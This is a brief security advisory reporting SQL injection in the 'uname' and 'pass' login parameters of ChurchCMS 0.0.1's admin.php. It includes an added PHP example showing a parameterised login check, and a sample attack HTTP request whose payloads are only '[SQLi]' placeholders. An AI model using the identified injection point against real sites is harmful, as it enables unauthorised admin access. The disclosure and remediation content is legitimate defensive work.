ChurchCMS 0.0.1 'admin.php' Multiple SQLi

##### Description #####

ChurchCMS is the software to place on your church’s website that is easily managed, self-intuitive, yet expandable via our module library.

Included features are: announcements, calendar, prayer requests manager, and help wanted manager.

##### Vulnerability #####

The admin.php page has multiple SQL injection vulnerabilities. Both the ‘uname’ and ‘pass’ parameters are vulnerable to SQL injection.

The vulnerability exists via the POST method.
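
For remediation, the login check can be written so that neither POST parameter ever becomes part of the SQL text. The following is an added example, not ChurchCMS code and not from the advisory's author; the function names, the users(uname, pass_hash) schema and the length limits are assumptions, and the demo data is constructed.

```php
<?php
declare(strict_types=1);

// Hypothetical login check for a handler such as admin.php?op=login (PHP 8+).
// Assumed schema, not taken from ChurchCMS: users(uname, pass_hash).
// The bug class in the advisory arises when 'uname' and 'pass' are spliced
// into the SQL string; here neither value ever becomes part of the SQL text.

function dummy_hash(): string
{
    // Computed once; used so unknown users cost the same as known ones.
    static $hash = null;
    return $hash ??= password_hash('unused-placeholder', PASSWORD_DEFAULT);
}

function check_login(PDO $db, mixed $uname, mixed $pass): bool
{
    // PHP turns uname[]=x into an array; accept only bounded strings.
    if (!is_string($uname) || !is_string($pass)
        || $uname === '' || strlen($uname) > 64 || strlen($pass) > 1024) {
        return false;
    }

    // Bound parameter: the driver transmits $uname as data, so quotes or
    // SQL keywords inside it cannot change the statement's structure.
    $stmt = $db->prepare('SELECT pass_hash FROM users WHERE uname = :uname');
    $stmt->execute([':uname' => $uname]);
    $stored = $stmt->fetchColumn();

    // The password is compared against a stored hash, never placed in SQL.
    $known = is_string($stored);
    $match = password_verify($pass, $known ? $stored : dummy_hash());
    return $known && $match;
}

// Constructed demo data in an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (uname TEXT PRIMARY KEY, pass_hash TEXT NOT NULL)');
$ins = $db->prepare('INSERT INTO users (uname, pass_hash) VALUES (?, ?)');
$ins->execute(["o'brien", password_hash('correct horse', PASSWORD_DEFAULT)]);

// Cases: valid login, wrong password, unknown user, array-valued parameter.
var_dump(check_login($db, "o'brien", 'correct horse'));
var_dump(check_login($db, "o'brien", 'wrong'));
var_dump(check_login($db, 'nobody', 'correct horse'));
var_dump(check_login($db, ['x'], 'correct horse'));
```

When the backend is MySQL through pdo_mysql, setting PDO::ATTR_EMULATE_PREPARES to false makes the server, rather than the client library, perform the parameter binding.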

##### Exploit #####

POST http://localhost/churchcms/admin.php?op=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Proxy-Connection: keep-alive
Referer: http://localhost/churchcms/index.php
Cookie: PHPSESSID=eq342ldrgqt4i5fshe6q2kvj17
Content-Type: application/x-www-form-urlencoded
Content-length: 40

uname=[SQLi]&pass=[SQLi]

##### Vendor Notification #####

04/21/12 – Vendor notified

Per my disclosure policy, advisory is released.

http://www.g13net.com/vuln-disc.txt